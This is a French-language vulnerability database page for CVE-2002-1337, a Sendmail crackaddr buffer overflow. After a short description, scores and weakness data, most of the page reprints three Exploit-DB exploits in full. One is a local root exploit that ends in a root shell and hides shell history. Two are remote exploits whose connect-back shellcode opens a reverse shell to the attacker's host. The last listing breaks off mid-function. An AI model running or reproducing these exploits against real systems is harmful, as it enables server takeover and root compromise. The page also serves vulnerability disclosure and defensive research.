CVE-2002-1337 : Détail

CVE-2002-1337

Overflow
85.96%V3
Network
2004-09-01
02h00 +00:00
2010-05-20
22h00 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in Sendmail 5.79 to 8.12.7 allows remote attackers to execute arbitrary code via certain formatted address fields, related to sender and recipient header comments as processed by the crackaddr function of headers.c.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 411

Date de publication : 2000-12-31 23h00 +00:00
Auteur : sd
EDB Vérifié : Yes

/* sendmail 8.11.x exploit (i386-Linux) by [email protected] (sd@ircnet) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This code exploits well-known local-root bug in sendmail 8.11.x, 8.12.x may be vulnerable too, but I didn't test it. It gives instant root shell with +s sendmail 8.11.x, x < 6 We're using objdump, gdb & grep in order to obtain VECT, so make sure that they're on $PATH, works with 80% accuracy on stripped binaries on several distros without changing offsets (rh7.0, rh7.1, suse7.2, slackware 8.0...) Greetz: mlg & smoke : diz is mostly for .ro ppl ;) killall sl3 sorcerer : stop da fuckin' asking me how to sploit sm, diz crap is for lamers like you ;)))) devik : sm 0wns ;) to #linux.cz, #hack .... .... and to alot of other ppl, where i can't remeber theyr handles ;) args: -d specify depth of analysis (default=32) [bigger = more time] -o change offset (default = -32000) [between 1000..-64000] -v specify victim (default /usr/sbin/sendmail) [+s sm binary] -t specify temp directory (default /tmp/.sxp) [temporary files, should be mounted as nosuid] An example (redhat 7.0 CZ): ------------------------------------------------------------------------------- [sd@pikatchu sxp]$ gcc sx.c -o sx [sd@localhost sxp]$ ./sx ...-=[ Sendmail 8.11.x exploit, (c)oded by [email protected] [sd@ircnet], 2001 ]=-... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [*] Victim = /usr/sbin/sendmail [*] Depth = 32 [*] Offset = -16384 [*] Temp = /tmp/.sxp [*] ESP = 0xbfffe708 [+] Created /tmp/.sxp [+] Step 1. setuid() got = 0x080aa028 [*] Step 2. Copying /usr/sbin/sendmail to /tmp/.sxp/sm...OK [*] Step 3. Disassembling /tmp/.sxp/sm...OK, found 3 targets [*] Step 4. Exploiting 3 targets: [1] (33% of targets) GOT=0x080aa028, VECT=0x00000064, offset=-16384 [2] (66% of targets) GOT=0x080aa028, VECT=0x080c6260, offset=-16384 Voila babe, entering rootshell! Enjoy! uid=0(root) gid=0(root) groups=0(root) [root@pikatchu /]# whoami root [root@pikatchu /]# exit exit Thanx for choosing sd's products ;) [sd@pikatchu sxp]$ -------------------------------------------------------------------------------- Enjoy! And don't abuse it too much :) */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> #include <fcntl.h> #include <signal.h> #include <sys/wait.h> #include <string.h> #define SM "/usr/sbin/sendmail" #define OBJDUMP "objdump" #define GDB "gdb" #define GREP "grep" #define OURDIR "/tmp/.sxp" /* an basic regexp to get interesting stuff from disassembled output change it as you like if something doesn't work */ #define DLINE "%s -d %s 2> /dev/null | %s -B %d \"mov.*%%.l,(%%e..,%%e..,1)\" | %s \".mov .*0x80.*,%%e..\"" #define DLINEA OBJDUMP, vict, GREP, depth, GREP #define BRUTE_DLINE "%s -d %s 2> /dev/null | %s \".mov .*0x80.*,%%e..\"" #define BRUTE_DLINEA OBJDUMP, vict, GREP #define NOPLEN 32768 #define uchar unsigned char #define NOP 0x90 /* 19 bytes ;), shell must be appended */ char shellcode[] = "\xeb\x0c\x5b\x31\xc0\x50\x89\xe1" "\x89\xe2\xb0\x0b\xcd\x80\xe8\xef" "\xff\xff\xff"; char scode[512]; char dvict[] = SM; struct target { uint off; uint brk; uint vect; }; unsigned int get_esp() { __asm__("movl %esp,%eax"); } char ourdir[256] = OURDIR; /* cleanup */ void giveup(int i) { char buf[256]; sprintf(buf, "/bin/rm -rf %s > /dev/null 2> /dev/null", ourdir); system(buf); if (i >= 0) exit(i); } /* main sploit, stolen mostly from alsou.c ;) */ void sploit(char *victim, uint got, uint vect, uint ret) { uchar egg[sizeof(scode) + NOPLEN + 5]; char s[512] = "-d"; char *argv[3]; char *envp[2]; uint first, last, i; strcpy(egg, "EGG="); memset(egg + 4, NOP, NOPLEN); strcpy(egg + 4 + NOPLEN, scode); last = first = -vect - (0xffffffff - got + 1); while (ret) { char tmp[256]; i = ret & 0xff; sprintf(tmp, "%u-%u.%u-", first, last, i); strcat(s, tmp); last = ++first; ret = ret >> 8; } s[strlen(s) - 1] = 0; argv[0] = victim; argv[1] = s; argv[2] = NULL; envp[0] = egg; envp[1] = NULL; execve(victim, argv, envp); } int use(char *s) { printf("%s [command] [options]\n" "-h this help\n" "-d specify depth of analysis (default=32)\n" "-o change offset (default = -32000)\n" "-v specify victim (default /usr/sbin/sendmail)\n" "-t specify temp directory (default /tmp/.sxp)\n" "-b enables bruteforce (WARNING: this may take about 20-30 minutes!)\n", s); return 1; } /* exploited flag */ int exploited = 0; /* child root-shell will send us SIGUSR if everything is ok */ void sigusr(int i) { exploited++; giveup(-1); } int main(int argc, char *argv[]) { char victim[256] = SM; char vict[256]; char gscr[256]; char path[256]; char d[256]; struct stat st; FILE *f; char buf[256]; int got; struct target t[1024]; uint off, ep, l; int i,j; int offset = -16384; int esp; int depth = 32; int brute = 0; /* rootshell (if argv[0] == NULL) */ if (!*argv) { /* open stdin and stdout */ dup2(2, 0); dup2(2, 1); setuid(0); /* regain root privs */ setgid(0); /* send signal to parent that exploit is done */ kill(getppid(), SIGUSR1); /* l-a-m-e ;) */ printf("\nVoila babe, entering rootshell!\nEnjoy!\n"); fflush(stdout); chdir("/"); system("/usr/bin/id"); setenv("BASH_HISTORY", "/dev/null", 1); execl("/bin/bash", "-bash", NULL); } printf("\n...-=[ Sendmail 8.11.x exploit, (c)oded by [email protected] [sd@ircnet], 2001 ]=-...\n" " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n"); while ( ( i = getopt(argc, argv, "hd:o:v:t:b") ) != EOF) { switch (i) { case 'd': if ((!optarg) || (sscanf(optarg, "%d", &depth) != 1)) return use(argv[0]); break; case 'o': if ((!optarg) || (sscanf(optarg, "%d", &offset) != 1)) return use(argv[0]); break; case 'v': if (!optarg) return use(argv[0]); strcpy(victim, optarg); break; case 't': if (!optarg) return use(argv[0]); strcpy(ourdir, optarg); break; case 'b': brute++; break; case 'h': default: return use(argv[0]); } } if (brute) printf("[*] Using brute force, this may take some time\n"); /* create full path to rootshell, cause sendmail will change it's cwd */ path[0] = 0; if (argv[0][0] != '/') { getcwd(path, 256); } /* construct shellcode */ sprintf(scode, "%s%s/%s", shellcode, path, argv[0]); /* get stack frame */ esp = get_esp(); close(0); signal(SIGUSR1, sigusr); /* remove old stuff */ giveup(-1); printf( "[*] Victim = %s\n" "[*] Depth = %d\n" "[*] Offset = %d\n" "[*] Temp = %s\n" "[*] ESP = 0x%08x\n", victim, depth, offset, ourdir, esp); stat(victim, &st); if ((st.st_mode & S_ISUID) == 0) { printf("[-] Bad: %s isn't suid ;(\n", victim); } if (access(victim, R_OK + X_OK + F_OK) < 0) { printf("[-] Bad: We haven't access to %s !\n", victim); } if (mkdir(ourdir, 0777) < 0) { perror("[-] Can't create our tempdir!\n"); giveup(1); } printf("[+] Created %s\n", ourdir); sprintf(buf, "%s -R %s | grep setuid", OBJDUMP, victim); f = popen(buf, "r"); if (fscanf(f, "%x", &got) != 1) { pclose(f); printf("[-] Cannot get setuid() GOT\n"); giveup(1); } /* get GOT */ pclose(f); printf("[+] Step 1. setuid() got = 0x%08x\n", got); sprintf(vict, "%s/sm", ourdir); printf("[*] Step 2. Copying %s to %s...", victim, vict); fflush(stdout); sprintf(buf, "/bin/cp -f %s %s", victim, vict); system(buf); if (access(vict, R_OK + X_OK + F_OK) < 0) { perror("Failed"); giveup(1); } printf("OK\n"); /* disassemble & find targets*/ printf("[*] Step 3. Disassembling %s...", vict); fflush(stdout); if (!brute) { sprintf(buf, DLINE, DLINEA); } else { sprintf(buf, BRUTE_DLINE, BRUTE_DLINEA); } f = popen(buf, "r"); i = 0; while (fgets(buf, 256, f)) { int k, dontadd = 0; if (sscanf(buf, "%x: %s %s %s %s %s %s 0x%x,%s\n", &ep, d, d, d, d, d, d, &off, d) == 9) { /* same value ? */ for (k=0; k < i; k++) { if (t[k].off == off) dontadd++; } /* new value ? */ if (!dontadd) { /* add it to table */ t[i].off = off; t[i++].brk = ep; } } } pclose(f); printf("OK, found %d targets\n", i); /* gdb every target and look for theyr VECT */ printf("[*] Step 4. Exploiting %d targets:\n", i); fflush(stdout); sprintf(gscr, "%s/gdb", ourdir); off = 0; for (j=0; j < i; j++) { /* create gdb script */ f = fopen(gscr, "w+"); if (!f) { printf("Cannot create gdb script\n"); giveup(1); } fprintf(f, "break *0x%x\nr -d1-1.1\nx/x 0x%x\n", t[j].brk, t[j].off); fclose(f); sprintf(buf, "%s -batch -x %s %s 2> /dev/null", GDB, gscr, vict); f = popen(buf, "r"); if (!f) { printf("Failed to spawn gdb!\n"); giveup(1); } /* scan gdb's output */ while (1) { char buf[256]; char *p; t[j].vect = 0; p = fgets(buf, 256, f); if (!p) break; if (sscanf(p, "0x%x %s 0x%x", &ep, d, &l) == 3) { t[j].vect = l; off++; break; } } pclose(f); if (t[j].vect) { int pid; printf("[%d] (%d%% of targets) GOT=0x%08x, VECT=0x%08x, offset=%d\n", j, j*100/i , got, t[j].vect, offset); fflush(stdout); pid = fork(); if (pid == 0) { close(1); sploit(victim, got, t[j].vect, esp + offset); } /* wait until sendmail finishes (expoit failed) or until SIGUSR arrives */ wait(NULL); /* exploited ?? */ if (exploited) { wait(NULL); /* kill zombie */ printf("Thanx for choosing sd's products ;)\n"); exit(0); } } } printf("[-] All targets failed, probably not vulnerable ;(\n"); giveup(1); } /* That's all. */ // milw0rm.com [2001-01-01]
Exploit Database EDB-ID : 22313

Date de publication : 2003-03-01 23h00 +00:00
Auteur : Last Stage of Delirium
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/6991/info Sendmail is prone to a remotely buffer-overflow vulnerability in the SMTP header parsing component. Successful attackers may exploit this vulnerability to gain control of affected servers. Reportedly, this vulnerability may be locally exploitable if the sendmail binary is setuid/setgid. Sendmail 5.2 to 8.12.7 are affected. Administrators are advised to upgrade to 8.12.8 or to apply patches to earlier versions of the 8.12.x tree. /*## copyright LAST STAGE OF DELIRIUM mar 2003 poland *://lsd-pl.net/ #*/ /*## sendmail 8.11.6 #*/ /* proof of concept code for remote sendmail vulnerability */ /* usage: linx86_sendmail target [-l localaddr] [-b localport] [-p ptr] */ /* [-c count] [-t timeout] [-v 80] */ /* where: */ /* target - address of the target host to run this code against */ /* localaddr - address of the host you are running this code from */ /* localport - local port that will listen for shellcode connection */ /* ptr - base ptr of the sendmail buffer containing our arbitrary data */ /* count - brute force loop counter */ /* timeout - select call timeout while waiting for shellcode connection */ /* v - version of the target OS (currently only Slackware 8.0 is supported) */ /* */ #include <sys/types.h> #include <sys/socket.h> #include <sys/time.h> #include <netinet/in.h> #include <unistd.h> #include <netdb.h> #include <stdio.h> #include <fcntl.h> #include <errno.h> #define NOP 0xf8 #define MAXLINE 2048 #define PNUM 12 #define OFF1 (288+156-12) #define OFF2 (1088+288+156+20+48) #define OFF3 (139*2) int tab[]={23,24,25,26}; #define IDX2PTR(i) (PTR+i-OFF1) #define ALLOCBLOCK(idx,size) memset(&lookup[idx],1,size) #define NOTVALIDCHAR(c) (((c)==0x00)||((c)==0x0d)||((c)==0x0a)||((c)==0x22)||\ (((c)&0x7f)==0x24)||(((c)>=0x80)&&((c)<0xa0))) #define AOFF 33 #define AMSK 38 #define POFF 48 #define PMSK 53 char* lookup=NULL; int gfirst; char shellcode[]= /* 116 bytes */ "\xeb\x02" /* jmp <shellcode+4> */ "\xeb\x08" /* jmp <shellcode+12> */ "\xe8\xf9\xff\xff\xff" /* call <shellcode+2> */ "\xcd\x7f" /* int $0x7f */ "\xc3" /* ret */ "\x5f" /* pop %edi */ "\xff\x47\x01" /* incl 0x1(%edi) */ "\x31\xc0" /* xor %eax,%eax */ "\x50" /* push %eax */ "\x6a\x01" /* push $0x1 */ "\x6a\x02" /* push $0x2 */ "\x54" /* push %esp */ "\x59" /* pop %ecx */ "\xb0\x66" /* mov $0x66,%al */ "\x31\xdb" /* xor %ebx,%ebx */ "\x43" /* inc %ebx */ "\xff\xd7" /* call *%edi */ "\xba\xff\xff\xff\xff" /* mov $0xffffffff,%edx */ "\xb9\xff\xff\xff\xff" /* mov $0xffffffff,%ecx */ "\x31\xca" /* xor %ecx,%edx */ "\x52" /* push %edx */ "\xba\xfd\xff\xff\xff" /* mov $0xfffffffd,%edx */ "\xb9\xff\xff\xff\xff" /* mov $0xffffffff,%ecx */ "\x31\xca" /* xor %ecx,%edx */ "\x52" /* push %edx */ "\x54" /* push %esp */ "\x5e" /* pop %esi */ "\x6a\x10" /* push $0x10 */ "\x56" /* push %esi */ "\x50" /* push %eax */ "\x50" /* push %eax */ "\x5e" /* pop %esi */ "\x54" /* push %esp */ "\x59" /* pop %ecx */ "\xb0\x66" /* mov $0x66,%al */ "\x6a\x03" /* push $0x3 */ "\x5b" /* pop %ebx */ "\xff\xd7" /* call *%edi */ "\x56" /* push %esi */ "\x5b" /* pop %ebx */ "\x31\xc9" /* xor %ecx,%ecx */ "\xb1\x03" /* mov $0x3,%cl */ "\x31\xc0" /* xor %eax,%eax */ "\xb0\x3f" /* mov $0x3f,%al */ "\x49" /* dec %ecx */ "\xff\xd7" /* call *%edi */ "\x41" /* inc %ecx */ "\xe2\xf6" /* loop <shellcode+81> */ "\x31\xc0" /* xor %eax,%eax */ "\x50" /* push %eax */ "\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */ "\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */ "\x54" /* push %esp */ "\x5b" /* pop %ebx */ "\x50" /* push %eax */ "\x53" /* push %ebx */ "\x54" /* push %esp */ "\x59" /* pop %ecx */ "\x31\xd2" /* xor %edx,%edx */ "\xb0\x0b" /* mov $0xb,%al */ "\xff\xd7" /* call *%edi */ ; int PTR,MPTR=0xbfffa01c; void putaddr(char* p,int i) { *p++=(i&0xff); *p++=((i>>8)&0xff); *p++=((i>>16)&0xff); *p++=((i>>24)&0xff); } void sendcommand(int sck,char *data,char resp) { char buf[1024]; int i; if (send(sck,data,strlen(data),0)<0) { perror("error");exit(-1); } if (resp) { if ((i=recv(sck,buf,sizeof(buf),0))<0) { perror("error");exit(-1); } buf[i]=0; printf("%s",buf); } } int rev(int a){ int i=1; if((*(char*)&i)) return(a); return((a>>24)&0xff)|(((a>>16)&0xff)<<8)|(((a>>8)&0xff)<<16)|((a&0xff)<<24); } void initlookup() { int i; if (!(lookup=(char*)malloc(MAXLINE))) { printf("error: malloc\n");exit(-1); } ALLOCBLOCK(0,MAXLINE); memset(lookup+OFF1,0,OFF2-OFF1); for(i=0;i<sizeof(tab)/4;i++) ALLOCBLOCK(OFF1+4*tab[i],4); gfirst=1; } int validaddr(int addr) { unsigned char buf[4],c; int i,*p=(int*)buf; *p=addr; for(i=0;i<4;i++) { c=buf[i]; if (NOTVALIDCHAR(c)) return 0; } return 1; } int freeblock(int idx,int size) { int i,j; for(i=j=0;i<size;i++) { if (!lookup[idx+i]) j++; } return (i==j); } int findblock(int addr,int size,int begin) { int i,j,idx,ptr; ptr=addr; if (begin) { idx=OFF1+addr-PTR; while(1) { while(((!validaddr(ptr))||lookup[idx])&&(idx<OFF2)) { idx+=4; ptr+=4; } if (idx>=OFF2) return 0; if (freeblock(idx,size)) return idx; idx+=4; ptr+=4; } } else { idx=addr-PTR; while(1) { while(((!validaddr(ptr))||lookup[idx])&&(idx>OFF1)) { idx-=4; ptr-=4; } if (idx<OFF1) return 0; if (freeblock(idx,size)) return idx; idx-=4; ptr-=4; } } } int findsblock(int sptr) { int optr,sidx,size; size=gfirst ? 0x2c:0x04; optr=sptr; while(sidx=findblock(sptr,size,1)) { sptr=IDX2PTR(sidx); if (gfirst) { if (validaddr(sptr)) { ALLOCBLOCK(sidx,size); break; } else sptr=optr; } else { if (validaddr(sptr-0x18)&&freeblock(sidx-0x18,4)&&freeblock(sidx+0x0c,4)&& freeblock(sidx+0x10,4)&&freeblock(sidx-0x0e,4)) { ALLOCBLOCK(sidx-0x18,4); ALLOCBLOCK(sidx-0x0e,2); ALLOCBLOCK(sidx,4); ALLOCBLOCK(sidx+0x0c,4); ALLOCBLOCK(sidx+0x10,4); sidx-=0x18; break; } else sptr=optr; } sptr+=4; optr=sptr; } gfirst=0; return sidx; } int findfblock(int fptr,int i1,int i2,int i3) { int fidx,optr; optr=fptr; while(fidx=findblock(fptr,4,0)) { fptr=IDX2PTR(fidx); if (validaddr(fptr-i2)&&validaddr(fptr-i2-i3)&&freeblock(fidx-i3,4)&& freeblock(fidx-i2-i3,4)&&freeblock(fidx-i2-i3+i1,4)) { ALLOCBLOCK(fidx,4); ALLOCBLOCK(fidx-i3,4); ALLOCBLOCK(fidx-i2-i3,4); ALLOCBLOCK(fidx-i2-i3+i1,4); break; } else fptr=optr; fptr-=4; optr=fptr; } return fidx; } void findvalmask(char* val,char* mask,int len) { int i; unsigned char c,m; for(i=0;i<len;i++) { c=val[i]; m=0xff; while(NOTVALIDCHAR(c^m)||NOTVALIDCHAR(m)) m--; val[i]=c^m; mask[i]=m; } } void initasmcode(char *addr,int port) { char abuf[4],amask[4],pbuf[2],pmask[2]; char name[256]; struct hostent *hp; int i; if (!addr) gethostname(name,sizeof(name)); else strcpy(name,addr); if ((i=inet_addr(name))==-1) { if ((hp=gethostbyname(name))==NULL) { printf("error: address\n");exit(-1); } memcpy(&i,hp->h_addr,4); } putaddr(abuf,rev(i)); pbuf[0]=(port>>8)&0xff; pbuf[1]=(port)&0xff; findvalmask(abuf,amask,4); findvalmask(pbuf,pmask,2); memcpy(&shellcode[AOFF],abuf,4); memcpy(&shellcode[AMSK],amask,4); memcpy(&shellcode[POFF],pbuf,2); memcpy(&shellcode[PMSK],pmask,2); } int main(int argc,char **argv){ int sck,srv,i,j,cnt,jidx,aidx,sidx,fidx,aptr,sptr,fptr,ssize,fsize,jmp; int c,l,i1,i2,i3,i4,found,vers=80,count=256,timeout=1,port=25; fd_set readfs; struct timeval t; struct sockaddr_in address; struct hostent *hp; char buf[4096],cmd[4096]; char *p,*host,*myhost=NULL; printf("copyright LAST STAGE OF DELIRIUM mar 2003 poland //lsd-pl.net/\n"); printf("sendmail 8.11.6 for Slackware 8.0 x86\n\n"); if (argc<3) { printf("usage: %s target [-l localaddr] [-b localport] [-p ptr] [-c count] [-t timeout] [-v 80]\n",argv[0]); exit(-1); } while((c=getopt(argc-1,&argv[1],"b:c:l:p:t:v:"))!=-1) { switch(c) { case 'b': port=atoi(optarg);break; case 'c': count=atoi(optarg);break; case 'l': myhost=optarg;break; case 't': timeout=atoi(optarg);break; case 'v': vers=atoi(optarg);break; case 'p': sscanf(optarg,"%x",&MPTR); } } host=argv[1]; srv=socket(AF_INET,SOCK_STREAM,0); bzero(&address,sizeof(address)); address.sin_family=AF_INET; address.sin_port=htons(port); if (bind(srv,(struct sockaddr*)&address,sizeof(address))==-1) { printf("error: bind\n");exit(-1); } if (listen(srv,10)==-1) { printf("error: listen\n");exit(-1); } initasmcode(myhost,port); for(i4=0;i4<count;i4++,MPTR+=cnt*4) { PTR=MPTR; sck=socket(AF_INET,SOCK_STREAM,0); bzero(&address,sizeof(address)); address.sin_family=AF_INET; address.sin_port=htons(25); if ((address.sin_addr.s_addr=inet_addr(host))==-1) { if ((hp=gethostbyname(host))==NULL) { printf("error: address\n");exit(-1); } memcpy(&address.sin_addr.s_addr,hp->h_addr,4); } if (connect(sck,(struct sockaddr*)&address,sizeof(address))==-1) { printf("error: connect\n");exit(-1); } initlookup(); sendcommand(sck,"helo yahoo.com\n",0); sendcommand(sck,"mail from: [email protected]\n",0); sendcommand(sck,"rcpt to: lp\n",0); sendcommand(sck,"data\n",0); aidx=findblock(PTR,PNUM*4,1); ALLOCBLOCK(aidx,PNUM*4); aptr=IDX2PTR(aidx); printf(".");fflush(stdout); jidx=findblock(PTR,strlen(shellcode)+PNUM*4,1); ALLOCBLOCK(jidx,strlen(shellcode)+PNUM*4); switch(vers) { case 80: l=28;i1=0x46;i2=0x94;i3=0x1c;break; default: exit(-1); } i2-=8; p=buf; for(i=0;i<138;i++) { *p++='<';*p++='>'; } *p++='('; for(i=0;i<l;i++) *p++=NOP; *p++=')'; *p++=0; putaddr(&buf[OFF3+l],aptr); sprintf(cmd,"From: %s\n",buf); sendcommand(sck,cmd,0); sendcommand(sck,"Subject: hello\n",0); memset(cmd,NOP,MAXLINE); cmd[MAXLINE-2]='\n'; cmd[MAXLINE-1]=0; cnt=0; while(cnt<PNUM) { sptr=aptr; fptr=IDX2PTR(OFF2); if (!(sidx=findsblock(sptr))) break; sptr=IDX2PTR(sidx); if (!(fidx=findfblock(fptr,i1,i2,i3))) break; fptr=IDX2PTR(fidx); jmp=IDX2PTR(jidx); while (!validaddr(jmp)) jmp+=4; putaddr(&cmd[aidx],sptr); putaddr(&cmd[sidx+0x24],aptr); putaddr(&cmd[sidx+0x28],aptr); putaddr(&cmd[sidx+0x18],fptr-i2-i3); putaddr(&cmd[fidx-i2-i3],0x01010101); putaddr(&cmd[fidx-i2-i3+i1],0xfffffff8); putaddr(&cmd[fidx-i3],fptr-i3); putaddr(&cmd[fidx],jmp); aidx+=4; PTR-=4; cnt++; } p=&cmd[jidx+4*PNUM]; for(i=0;i<strlen(shellcode);i++) { *p++=shellcode[i]; } sendcommand(sck,cmd,0); sendcommand(sck,"\n",0); sendcommand(sck,".\n",0); free(lookup); FD_ZERO(&readfs); FD_SET(0,&readfs); FD_SET(srv,&readfs); t.tv_sec=timeout; t.tv_usec=0; if (select(srv+1,&readfs,NULL,NULL,&t)>0) { close(sck); found=1; if ((sck=accept(srv,(struct sockaddr*)&address,&l))==-1) { printf("error: accept\n");exit(-1); } close(srv); printf("\nbase 0x%08x mcicache 0x%08x\n",PTR,aptr); write(sck,"/bin/uname -a\n",14); } else { close(sck); found=0; } while(found){ FD_ZERO(&readfs); FD_SET(0,&readfs); FD_SET(sck,&readfs); if(select(sck+1,&readfs,NULL,NULL,NULL)){ int cnt; char buf[1024]; if(FD_ISSET(0,&readfs)){ if((cnt=read(0,buf,1024))<1){ if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else {printf("koniec\n");exit(-1);} } write(sck,buf,cnt); } if(FD_ISSET(sck,&readfs)){ if((cnt=read(sck,buf,1024))<1){ if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else {printf("koniec\n");exit(-1);} } write(1,buf,cnt); } } } } }
Exploit Database EDB-ID : 22314

Date de publication : 2003-03-01 23h00 +00:00
Auteur : bysin
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/6991/info Sendmail is prone to a remotely buffer-overflow vulnerability in the SMTP header parsing component. Successful attackers may exploit this vulnerability to gain control of affected servers. Reportedly, this vulnerability may be locally exploitable if the sendmail binary is setuid/setgid. Sendmail 5.2 to 8.12.7 are affected. Administrators are advised to upgrade to 8.12.8 or to apply patches to earlier versions of the 8.12.x tree. /* Sendmail <8.12.8 crackaddr() exploit by bysin */ /* from the l33tsecurity crew */ #include <sys/types.h> #include <sys/socket.h> #include <sys/time.h> #include <netinet/in.h> #include <unistd.h> #include <netdb.h> #include <stdio.h> #include <fcntl.h> #include <errno.h> int maxarch=1; struct arch { char *os; int angle,nops; unsigned long aptr; } archs[] = { {"Slackware 8.0 with sendmail 8.11.4",138,1,0xbfffbe34} }; ///////////////////////////////////////////////////////// #define LISTENPORT 2525 #define BUFSIZE 4096 char code[]= /* 116 bytes */ "\xeb\x02" /* jmp <shellcode+4> */ "\xeb\x08" /* jmp <shellcode+12> */ "\xe8\xf9\xff\xff\xff" /* call <shellcode+2> */ "\xcd\x7f" /* int $0x7f */ "\xc3" /* ret */ "\x5f" /* pop %edi */ "\xff\x47\x01" /* incl 0x1(%edi) */ "\x31\xc0" /* xor %eax,%eax */ "\x50" /* push %eax */ "\x6a\x01" /* push $0x1 */ "\x6a\x02" /* push $0x2 */ "\x54" /* push %esp */ "\x59" /* pop %ecx */ "\xb0\x66" /* mov $0x66,%al */ "\x31\xdb" /* xor %ebx,%ebx */ "\x43" /* inc %ebx */ "\xff\xd7" /* call *%edi */ "\xba\xff\xff\xff\xff" /* mov $0xffffffff,%edx */ "\xb9\xff\xff\xff\xff" /* mov $0xffffffff,%ecx */ "\x31\xca" /* xor %ecx,%edx */ "\x52" /* push %edx */ "\xba\xfd\xff\xff\xff" /* mov $0xfffffffd,%edx */ "\xb9\xff\xff\xff\xff" /* mov $0xffffffff,%ecx */ "\x31\xca" /* xor %ecx,%edx */ "\x52" /* push %edx */ "\x54" /* push %esp */ "\x5e" /* pop %esi */ "\x6a\x10" /* push $0x10 */ "\x56" /* push %esi */ "\x50" /* push %eax */ "\x50" /* push %eax */ "\x5e" /* pop %esi */ "\x54" /* push %esp */ "\x59" /* pop %ecx */ "\xb0\x66" /* mov $0x66,%al */ "\x6a\x03" /* push $0x3 */ "\x5b" /* pop %ebx */ "\xff\xd7" /* call *%edi */ "\x56" /* push %esi */ "\x5b" /* pop %ebx */ "\x31\xc9" /* xor %ecx,%ecx */ "\xb1\x03" /* mov $0x3,%cl */ "\x31\xc0" /* xor %eax,%eax */ "\xb0\x3f" /* mov $0x3f,%al */ "\x49" /* dec %ecx */ "\xff\xd7" /* call *%edi */ "\x41" /* inc %ecx */ "\xe2\xf6" /* loop <shellcode+81> */ "\x31\xc0" /* xor %eax,%eax */ "\x50" /* push %eax */ "\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */ "\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */ "\x54" /* push %esp */ "\x5b" /* pop %ebx */ "\x50" /* push %eax */ "\x53" /* push %ebx */ "\x54" /* push %esp */ "\x59" /* pop %ecx */ "\x31\xd2" /* xor %edx,%edx */ "\xb0\x0b" /* mov $0xb,%al */ "\xff\xd7" /* call *%edi */ ; void header() { printf("\nSendmail <8.12.8 crackaddr() exploit by bysin\n"); printf(" from the l33tsecurity crew \n\n"); } void printtargets() { unsigned long i; header(); printf("\t Target\t Addr\t\t OS\n"); printf("\t-------------------------------------------\n"); for (i=0;i<maxarch;i++) printf("\t* %d\t\t 0x%08x\t %s\n",i,archs[i].aptr,archs[i].os); printf("\n"); } void writesocket(int sock, char *buf) { if (send(sock,buf,strlen(buf),0) <= 0) { printf("Error writing to socket\n"); exit(0); } } void readsocket(int sock, int response) { char temp[BUFSIZE]; memset(temp,0,sizeof(temp)); if (recv(sock,temp,sizeof(temp),0) <= 0) { printf("Error reading from socket\n"); exit(0); } if (response != atol(temp)) { printf("Bad response: %s\n",temp); exit(0); } } int readutil(int sock, int response) { char temp[BUFSIZE],*str; while(1) { fd_set readfs; struct timeval tm; FD_ZERO(&readfs); FD_SET(sock,&readfs); tm.tv_sec=1; tm.tv_usec=0; if(select(sock+1,&readfs,NULL,NULL,&tm) <= 0) return 0; memset(temp,0,sizeof(temp)); if (recv(sock,temp,sizeof(temp),0) <= 0) { printf("Error reading from socket\n"); exit(0); } str=(char*)strtok(temp,"\n"); while(str && *str) { if (atol(str) == response) return 1; str=(char*)strtok(NULL,"\n"); } } } #define NOTVALIDCHAR(c) (((c)==0x00)||((c)==0x0d)||((c)==0x0a)||((c)==0x22)||(((c)&0x7f)==0x24)||(((c)>=0x80)&&((c)<0xa0))) void findvalmask(char* val,char* mask,int len) { int i; unsigned char c,m; for(i=0;i<len;i++) { c=val[i]; m=0xff; while(NOTVALIDCHAR(c^m)||NOTVALIDCHAR(m)) m--; val[i]=c^m; mask[i]=m; } } void fixshellcode(char *host, unsigned short port) { unsigned long ip; char abuf[4],amask[4],pbuf[2],pmask[2]; if ((ip = inet_addr(host)) == -1) { struct hostent *hostm; if ((hostm=gethostbyname(host)) == NULL) { printf("Unable to resolve local address\n"); exit(0); } memcpy((char*)&ip, hostm->h_addr, hostm->h_length); } abuf[3]=(ip>>24)&0xff; abuf[2]=(ip>>16)&0xff; abuf[1]=(ip>>8)&0xff; abuf[0]=(ip)&0xff; pbuf[0]=(port>>8)&0xff; pbuf[1]=(port)&0xff; findvalmask(abuf,amask,4); findvalmask(pbuf,pmask,2); memcpy(&code[33],abuf,4); memcpy(&code[38],amask,4); memcpy(&code[48],pbuf,2); memcpy(&code[53],pmask,2); } void getrootprompt() { int sockfd,sin_size,tmpsock,i; struct sockaddr_in my_addr,their_addr; char 